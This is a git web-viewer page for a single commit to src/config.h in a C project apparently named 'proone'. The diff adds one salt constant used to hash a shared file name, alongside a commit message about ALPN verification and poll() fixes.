aboutsummaryrefslogtreecommitdiff
path: root/src/config.h
diff options
context:
space:
mode:
authorDavid Timber <mieabby@gmail.com>2020-09-03 15:51:39 +0930
committerDavid Timber <mieabby@gmail.com>2020-09-03 15:52:28 +0930
commit55f73d9c963cdd1ddda8741e178d0930b99e2eb8 (patch)
tree95400f34e24b01b06e056635b7053565d6abd5e6 /src/config.h
parente81c2636cee72af718e99fd98006fa9277de2a65 (diff)
* [proone] Use hashed value for shared global file
name * [htbt] Verify ALPN * [htbt] Bug fixes regarding poll() * [htbt] Run w/o resolv
Diffstat (limited to 'src/config.h')
-rw-r--r--src/config.h1
1 files changed, 1 insertions, 0 deletions
diff --git a/src/config.h b/src/config.h
index bfcbc44..6206b63 100644
--- a/src/config.h
+++ b/src/config.h
@@ -15,4 +15,5 @@
#endif
#define PRNE_PROG_VER { 0x11, 0xf7, 0x6b, 0x87, 0x62, 0x1a, 0x47, 0x9c, 0xa2, 0x18, 0x5c, 0x55, 0x40, 0x33, 0x7c, 0x9f }
+#define PRNE_SHG_SALT { 0x31, 0xe4, 0xf1, 0x7c, 0xdb, 0x76, 0x43, 0x32, 0xaf, 0x48, 0xfd, 0x9f, 0xb8, 0x45, 0x3f, 0x8f }
extern const prne_arch_t prne_host_arch;